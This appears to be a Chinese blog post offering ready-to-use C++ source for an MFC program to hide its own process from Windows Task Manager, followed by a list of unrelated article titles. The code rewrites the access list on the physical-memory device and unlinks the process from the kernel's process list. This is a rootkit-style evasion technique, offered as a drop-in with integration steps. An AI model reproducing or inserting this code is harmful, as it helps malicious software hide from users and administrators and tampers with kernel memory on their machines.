MFC隐藏进程自身(任务管理器不可见,wSysCheck等工具可见)
来源:互联网 发布:域名哪里买 编辑:程序博客网 时间:2024/05/17 06:21
MFC隐藏进程
只要把cpp和h加入工程,include就可以了。代码地址://------------------HideProcess.h--------------------//加入MFC工程调用即可BOOL HideProcess(); //------------------HideProcess.cpp------------------#include "stdafx.h"#include<windows.h>#include<Accctrl.h>#include<Aclapi.h>#include"HideProcess.h" #define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING; #define OBJ_INHERIT 0x00000002L#define OBJ_PERMANENT 0x00000010L#define OBJ_EXCLUSIVE 0x00000020L#define OBJ_CASE_INSENSITIVE 0x00000040L#define OBJ_OPENIF 0x00000080L#define OBJ_OPENLINK 0x00000100L#define OBJ_KERNEL_HANDLE 0x00000200L#define OBJ_VALID_ATTRIBUTES 0x000003F2L typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes ); typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); RTLINITUNICODESTRING RtlInitUnicodeString;ZWOPENSECTION ZwOpenSection;HMODULE g_hNtDLL = NULL;PVOID g_pMapPhysicalMemory = NULL;HANDLE g_hMPM = NULL;OSVERSIONINFO g_osvi; //---------------------------------------------------------------------------BOOL InitNTDLL(){ g_hNtDLL = LoadLibrary("ntdll.dll"); if (NULL == g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection"); return TRUE;} //---------------------------------------------------------------------------VOID CloseNTDLL(){ if(NULL != g_hNtDLL) { FreeLibrary(g_hNtDLL); } g_hNtDLL = NULL;}//---------------------------------------------------------------------------VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD); if(ERROR_SUCCESS != dwRes) { if(pSD) { LocalFree(pSD); } if(pNewDacl) { LocalFree(pNewDacl); } } EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl); if(ERROR_SUCCESS != dwRes) { if(pSD) { LocalFree(pSD); } if(pNewDacl) { LocalFree(pNewDacl); } } dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if(ERROR_SUCCESS != dwRes) { if(pSD) { LocalFree(pSD); } if(pNewDacl) { LocalFree(pNewDacl); } }} //---------------------------------------------------------------------------HANDLE OpenPhysicalMemory(){ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion) { return NULL; } switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory = 0x30000; break; //2k case 1: PhyDirectory = 0x39000; break; //xp default: return NULL; } RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); } if(!NT_SUCCESS(status)) { return NULL; } g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000); if( g_pMapPhysicalMemory == NULL ) { return NULL; } return g_hMPM;} //---------------------------------------------------------------------------PVOID LinearToPhys(PULONG BaseAddress, PVOID addr){ ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr; PGDE = BaseAddress[VAddr>>22]; if (0 == (PGDE&1)) { return 0; } ULONG tmp = PGDE & 0x00000080; if (0 != tmp) { PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else { PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) { return 0; } PAddr = (PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } return (PVOID)PAddr;} //---------------------------------------------------------------------------ULONG GetData(PVOID addr){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys&0xfffff000, 0x1000); if (0 == tmp) { return 0; } ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret;}//---------------------------------------------------------------------------BOOL SetData(PVOID addr,ULONG data){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp) { return FALSE; } tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp); return TRUE;} //---------------------------------------------------------------------------long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp){ ExitProcess(0); return 1;}//---------------------------------------------------------------------------BOOL YHideProcess(){// SetUnhandledExceptionFilter(exeception); if (FALSE == InitNTDLL()) { return FALSE; } if (0 == OpenPhysicalMemory()) { return FALSE; } ULONG thread = GetData((PVOID)0xFFDFF124); //kteb ULONG process = GetData(PVOID(thread + 0x44)); //kpeb ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); } if (1 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw); CloseHandle(g_hMPM); CloseNTDLL(); return TRUE;} BOOL HideProcess(){ static BOOL b_hide = false; if (!b_hide) { b_hide = true; YHideProcess(); return TRUE; } return TRUE;} 这样在Example的Example.h中加入#include <HideProcess.h>在xample的Example.cpp中BOOL CExampleApp::InitInstance()加入HideProcess();即可。-------
0 1
- MFC隐藏进程自身(任务管理器不可见,wSysCheck等工具可见)
- MFC隐藏进程自身(任务管理器不可见,wSysCheck等工具可见)
- 设置程序在任务管理器隐藏,在进程可见
- 安卓View可见,不可见,隐藏。
- MFC隐藏进程,任务管理器内看不到
- 隐藏进程,不被任务管理器发现
- 按钮的隐藏与不可见
- Mac显示隐藏不可见的文件
- 定时杀死某个进程,并且使批处理窗口隐藏不可见
- Android中的进程简介(可见进程,前台进程,后台进程等)
- Android中的进程简介(可见进程,前台进程,后台进程等)
- 最基本的隐藏:不可见窗体+隐藏文件
- android空间隐藏或不可见属性visibility
- 设置View的可见以及不可见
- View的可见与不可见
- 56. 让不可见的更可见
- 设置控件可见与不可见
- VC设置控件可见与不可见
- 以太坊智能合约编程之菜鸟教程
- 实践,理论与层次
- Material Design--新闻浏览APP
- 垃圾回收算法
- ASM磁盘容量改变的故障处理
- MFC隐藏进程自身(任务管理器不可见,wSysCheck等工具可见)
- Google Android开发者文档系列-创建有内容分享特性的应用之添加一个简单的共享action
- dbwr调优
- android开发心得四
- 如何用source Insight查看.s文件
- MySQL管理常用命令
- 代理服务器与反向代理服务器的区别
- 归档爆满处理
- 北航面试之操作系统面试每章的重点Get(完整版)